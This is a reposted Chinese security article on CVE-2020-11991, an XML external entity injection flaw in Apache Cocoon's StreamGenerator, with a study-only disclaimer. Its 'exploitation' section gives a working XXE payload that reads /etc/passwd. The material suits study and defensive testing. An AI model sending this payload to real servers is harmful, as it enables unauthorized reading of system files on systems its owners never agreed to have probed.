码上快乐

相关内容   简体   繁体

Apache Cocoon XML注入[CVE-2020-11991]

本文转载自  查看原文  2020-09-14 11:21  747    Web安全/ 技巧

请遵守网络安全法!!!本文仅供学习交流使用!用于任何非授权渗透、非法目的攻击、从事非法活动均与笔者无关!读者自行承担其恶果!

漏洞简介

程序使用了StreamGenerator这个方法时,解析从外部请求的xml数据包未做相关的限制,恶意用户就可以构造任意的xml表达式,使服务器解析达到XML注入的安全问题。

利用姿势

<!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]>
<userInfo>
<firstName>John</firstName> 
<lastName>&ent;</lastName>
</userInfo>

来源

http://mail-archives.apache.org/mod_mbox/cocoon-users/202009.mbox/author


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



猜您在找 Apache SkyWalking SQL注入漏洞复现分析 (CVE-2020-9483) Apache #Tomcat CVE-2020-9484 OpenSSH的scp命令注入漏洞(CVE-2020-15778) CVE-2020-15778 Openssh命令注入漏洞复现 Apache Tomcat 文件包含漏洞(CVE-2020-1938) CVE-2020-1938:Apache-Tomcat-Ajp漏洞-复现 利用Apache Flink CVE-2020-17518 getshell CVE-2020-1938 Apache-Tomcat-Ajp 文件包含漏洞复现 Apache-Tomcat-Ajp漏洞(CVE-2020-1938)漏洞复现 Apache Kylin远程代码执行漏洞复现(CVE-2020-1956)
 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM